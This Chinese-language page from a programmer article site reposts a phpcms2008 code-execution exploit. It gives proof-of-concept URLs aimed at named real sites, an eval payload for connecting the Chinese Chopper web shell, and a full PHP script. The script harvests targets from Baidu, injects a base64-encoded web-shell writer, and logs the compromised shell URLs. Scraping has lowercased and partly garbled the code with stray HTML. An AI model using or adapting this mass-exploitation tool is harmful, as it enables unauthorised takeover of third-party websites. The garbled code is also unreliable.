欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

phpcms2008 代码执行 批量getshell EXP(使用菜刀)

程序员文章站 2022-07-10 10:09:21
这篇文章主要介绍了phpcms2008 代码执行 批量getshell EXP的相关资料,需要的朋友可以参考下... 14-05-09...

玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧

谷歌批量还需改进 一会儿会补上!

原文:

http://www.wooyun.org/bug.php?action=view&id=2984

测试如下:

http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}

测试结果:

http://www.cnqiyou.com/yp/product.php?pagesize=${@phpinfo()}

 phpcms2008 代码执行 批量getshell EXP(使用菜刀)

exp:

http://www.cnqiyou.com/yp/product.php?pagesize=${${@eval%28$_post[cmd]%29}}

直接菜刀链接

批量exp:

ps:根据百度搜索批量 


复制代码
代码如下:

<?php
error_reporting(e_error);
set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=readbaidulist($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file('url.txt');
if (in_array("$url\r\n",$url_list)){
echo "[-] links repeat\n";
}else{
$fp = @fopen('url.txt', 'a');
@fwrite($fp, $url."\r\n");
@fclose($fp);
print_r("
[-] get ...... $url\r\n");
if(okbug($url)){
$exploit=exploit($url);</p> <p>$ors=okor($url);
if ($ors){
echo "[*] shell:-> ".$url."/yp/fuck.php\n";
$fp = @fopen('shell.txt', 'a');
@fwrite($fp, $url."/yp/fuck.php\r\n");
@fclose($fp);

}
}else{

print "[-] no bug!\n";
}
}
}
}</p> <p>function exploit($url){
$host=$url;
$port="80";
$content <a href="mailto:='a=@eval(base64_decode($_post[z0]));&z0=qgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0%2bfcipozskznagpsbazm9wzw4oj2z1y2sucghwjywgj2enktsgdqonqgz3cml0zsgkznasjzw%2fcghwiebldmfskcrfue9tvftjzmtpbmddkts%2fpicpow0kdubmy2xvc2uojgzwkts7zwnobygifdwtiik7zgllkck7'">='a=@eval(base64_decode($_post[z0]));&z0=qgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0%2bfcipozskznagpsbazm9wzw4oj2z1y2sucghwjywgj2enktsgdqonqgz3cml0zsgkznasjzw%2fcghwiebldmfskcrfue9tvftjzmtpbmddkts%2fpicpow0kdubmy2xvc2uojgzwkts7zwnobygifdwtiik7zgllkck7'</a>;
$data = 'post <a>/yp/product.php?pagesize=${${@eval%28$_post[a]%29</a>}} http/1.1'."\r\n";
$data .= "x-forwarded-for: 199.1.88.29\r\n";
$data .= "referer: <a href="http://$host\r\n">http://$host\r\n</a>";
$data .= "content-type: application/x-www-form-urlencoded\r\n";
$data .= "user-agent: mozilla/5.0 (windows; windows nt 5.1; en-us) firefox/3.5.0\r\n";
$data .= "host: $host\r\n";
$data .= "content-length: ".strlen($content)."\r\n";
$data .= "cache-control: no-cache\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] no response from $host\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}</p> <p>function okor($host){
$tmp = array();
$data = '';
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,"get /yp/fuck.php http/1.1\r\nhost:$host\r\nconnection: close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if (strpos($data, '200') !== false) {
return true;
}else{
return false;
}
}
function okbug($host){
$tmp = array();
$data = '';
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,'get /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= http/1.1'."\r\nhost:$host\r\nconnection: close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if(preg_match('/(php.ini)/i',$data)) {
return true;
}else{
return false;
}
}</p> <p>function readbaidulist($keyword,$timeout,$nowpage)
{
$tmp = array();
//$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
@fputs($fp,"get /s?wd=".urlencode($keyword)."&pn=".$nowpage." http/1.1\r\nhost:[url]www.baidu.com[/url]\r\nconnection: close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
@fclose($fp);
preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
?>